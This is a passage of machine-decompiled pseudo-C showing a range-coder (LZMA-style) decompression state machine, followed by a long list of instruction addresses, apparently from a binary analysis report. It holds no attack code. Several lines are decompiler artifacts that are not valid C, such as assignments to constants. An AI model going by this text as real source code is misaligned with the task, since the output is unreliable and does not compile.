											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                  0x00000000
                                  0x00406f07
                                  0x00406f07
                                  0x00406f0b
                                  0x00406f34
                                  0x00406f3e
                                  0x00406f0d
                                  0x00406f16
                                  0x00406f23
                                  0x00406f26
                                  0x0040726a
                                  0x0040726a
                                  0x0040726d
                                  0x0040726d
                                  0x0040726d
                                  0x00407273
                                  0x00407279
                                  0x0040727f
                                  0x00407299
                                  0x0040729c
                                  0x004072a2
                                  0x004072ad
                                  0x004072af
                                  0x00407281
                                  0x00407281
                                  0x00407290
                                  0x00407294
                                  0x00407294
                                  0x004072b9
                                  0x00000000
                                  0x00000000
                                  0x004072bb
                                  0x004072bf
                                  0x0040746e
                                  0x00407484
                                  0x0040748c
                                  0x00407493
                                  0x00407495
                                  0x0040749c
                                  0x004074a0
                                  0x004074a0
                                  0x004072cb
                                  0x004072d2
                                  0x004072da
                                  0x004072dd
                                  0x004072e0
                                  0x004072e0
                                  0x004072e6
                                  0x004072e6
                                  0x00406a82
                                  0x00406a82
                                  0x00406a82
                                  0x00406a8b
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00000000
                                  0x00406a9c
                                  0x00000000
                                  0x00000000
                                  0x00406aa5
                                  0x00406aa8
                                  0x00406aab
                                  0x00406aaf
                                  0x00000000
                                  0x00000000
                                  0x00406ab5
                                  0x00406ab8
                                  0x00406aba
                                  0x00406abb
                                  0x00406abe
                                  0x00406ac0
                                  0x00406ac1
                                  0x00406ac3
                                  0x00406ac6
                                  0x00406acb
                                  0x00406ad0
                                  0x00406ad9
                                  0x00406aec
                                  0x00406aef
                                  0x00406afb
                                  0x00406b23
                                  0x00406b25
                                  0x00406b33
                                  0x00406b33
                                  0x00406b37
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406b27
                                  0x00406b27
                                  0x00406b2a
                                  0x00406b2b
                                  0x00406b2b
                                  0x00000000
                                  0x00406b27
                                  0x00406b01
                                  0x00406b06
                                  0x00406b06
                                  0x00406b0f
                                  0x00406b17
                                  0x00406b1a
                                  0x00000000
                                  0x00406b20
                                  0x00406b20
                                  0x00000000
                                  0x00406b20
                                  0x00000000
                                  0x00406b3d
                                  0x00406b3d
                                  0x00406b41
                                  0x004073ed
                                  0x00000000
                                  0x004073ed
                                  0x00406b4a
                                  0x00406b5a
                                  0x00406b5d
                                  0x00406b60
                                  0x00406b60
                                  0x00406b60
                                  0x00406b63
                                  0x00406b67
                                  0x00000000
                                  0x00000000
                                  0x00406b69
                                  0x00406b6f
                                  0x00406b99
                                  0x00406b9f
                                  0x00406ba6
                                  0x00000000
                                  0x00406ba6
                                  0x00406b75
                                  0x00406b78
                                  0x00406b7d
                                  0x00406b7d
                                  0x00406b88
                                  0x00406b90
                                  0x00406b93
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406bd8
                                  0x00406bde
                                  0x00406be1
                                  0x00406bee
                                  0x00406bf6
                                  0x0040726a
                                  0x00000000
